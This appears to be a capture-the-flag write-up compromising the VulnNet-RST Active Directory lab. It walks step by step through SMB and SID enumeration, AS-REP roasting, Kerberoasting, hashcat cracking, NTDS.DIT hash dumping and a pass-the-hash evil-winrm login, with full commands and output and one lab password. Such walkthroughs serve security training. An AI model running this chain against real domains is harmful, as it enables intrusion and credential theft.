I’m not familiar with how to attack a windows machine :(
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-04-27 04:21:48Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49702/tcp open msrpc syn-ack Microsoft Windows RPC
49767/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-27T04:22:41
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62030/tcp): CLEAN (Timeout)
| Check 2 (port 42522/tcp): CLEAN (Timeout)
| Check 3 (port 38398/udp): CLEAN (Timeout)
| Check 4 (port 24307/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|
SMBMAP
- First of all, port 445 is open, we enumeration with smbmap.
1
2
3
4
5
6
7
8
9
10
11
| smbmap -H 10.10.154.123 -u anonymous
[+] Guest session IP: 10.10.154.123:445 Name: 10.10.154.123
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
|
- Get all file from shared folder
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| smbclient //10.10.154.123/VulnNet-Enterprise-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> dir
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Enterprise-Operations.txt A 467 Thu Mar 11 20:24:34 2021
Enterprise-Safety.txt A 503 Thu Mar 11 20:24:34 2021
Enterprise-Sync.txt A 496 Thu Mar 11 20:24:34 2021
8540159 blocks of size 4096. 4296127 blocks available
smb: \> get Enterprise-Operations.txt
getting file \Enterprise-Operations.txt of size 467 as Enterprise-Operations.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Enterprise-Safety.txt
getting file \Enterprise-Safety.txt of size 503 as Enterprise-Safety.txt (0.2 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Enterprise-Sync.txt
getting file \Enterprise-Sync.txt of size 496 as Enterprise-Sync.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
smbclient //10.10.154.123/VulnNet-Business-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Business-Manager.txt A 758 Thu Mar 11 20:24:34 2021
Business-Sections.txt A 654 Thu Mar 11 20:24:34 2021
Business-Tracking.txt A 471 Thu Mar 11 20:24:34 2021
8540159 blocks of size 4096. 4296127 blocks available
smb: \> get Business-Manager.txt
getting file \Business-Manager.txt of size 758 as Business-Manager.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Business-Sections.txt
getting file \Business-Sections.txt of size 654 as Business-Sections.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> get Business-Tracking.txt
getting file \Business-Tracking.txt of size 471 as Business-Tracking.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
|
- Don’t have any interesting in those files.
Impacket username enumeration
- Read Only
IPC$ signifies ⇒ we can enumerate username with impacket
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| /opt/impacket/examples/lookupsid.py anonymous@10.10.154.123
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 10.10.154.123
[*] StringBinding ncacn_np:10.10.154.123[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
|
- Clean up with (SidTypeUser), we have list username
1
2
3
4
5
6
7
8
9
10
| cat user.txt
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet
|
- On port 88/tcp open kerberos-sec service
⇒ Retrieving hashes using ASREPRoast(https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast)
1
2
3
4
5
6
7
8
9
10
11
12
| /opt/impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile ./user.txt -no-pass -dc-ip 10.10.154.123 1 ⨯
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:[REDACTED]
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
|
- Find hash identify with name-that-hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| name-that-hash -f hash
_ _ _____ _ _ _ _ _
| \ | | |_ _| | | | | | | | | |
| \| | __ _ _ __ ___ ___ ______| | | |__ __ _| |_ ______| |_| | __ _ ___| |__
| . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______| _ |/ _` / __| '_ \
| |\ | (_| | | | | | | __/ | | | | | | (_| | |_ | | | | (_| \__ \ | | |
\_| \_/\__,_|_| |_| |_|\___| \_/ |_| |_|\__,_|\__| \_| |_/\__,_|___/_| |_|
https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash
$krb5asrep$23$t-skid@VULNNET-RST:[REDACTED]
Most Likely
Kerberos 5 AS-REP etype 23, HC: 18200 JtR: krb5pa-sha1 Summary: Used for Windows Active Directory
|
1
| hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
|
Keberoasting
- The credential that got from hash was for Remote IPC.
Use these to Kerberoast and obtain credentials for other services that running.
1
2
3
4
5
6
7
8
9
10
| opt/impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:********' -outputfile keberoast.hash -dc-ip 10.10.129.181
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ----------
CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-11 14:45:09.913979 2021-03-13 18:41:17.987528
[-] CCache file is not found. Skipping...
|
- Find hash identify with name-that-hash and Crack hash with hashcat
1
| hashcat -m 13100 keberoast.hash /usr/share/wordlists/rockyou.txt
|
- Use this cred to login to machine with evil-winrm ==> GOT USER FLAG.
Privilege Escalation
- Check SMB again with credentials of enterprise-core-vn
1
2
3
4
5
6
7
8
9
10
11
| smbmap -H 10.10.4.214 -u enterprise-core-vn -p ry=ibfkfv,s6h,
[+] IP: 10.10.4.214:445 Name: 10.10.4.214
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
|
Have new Disk shared SYSVOL
Enumeration, we got file ResetPassword.vbs that included credential.
- Check SMB again with credentials new user
1
2
3
4
5
6
7
8
9
10
11
12
| smbmap -H 10.10.30.208 -u ******* -p *********
[+] IP: 10.10.30.208:445 Name: 10.10.30.208
[\] Work[!] Unable to remove test directory at \\10.10.30.208\SYSVOL\VYGROILECB, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ, WRITE Logon server share
SYSVOL READ, WRITE Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
|
We can see that this user has write access tto SMB as the administrator. Let’s dump the hashes for this user.
1
2
3
4
5
6
7
8
| Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[-] RemoteOperations failed: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE(An instance of a named pipe cannot be found in the listening state.)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]
|
1
2
3
4
5
6
7
8
9
10
11
| evil-winrm -u administrator -H hash -i 10.10.86.216
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
|
GOT SYSTEM FLAG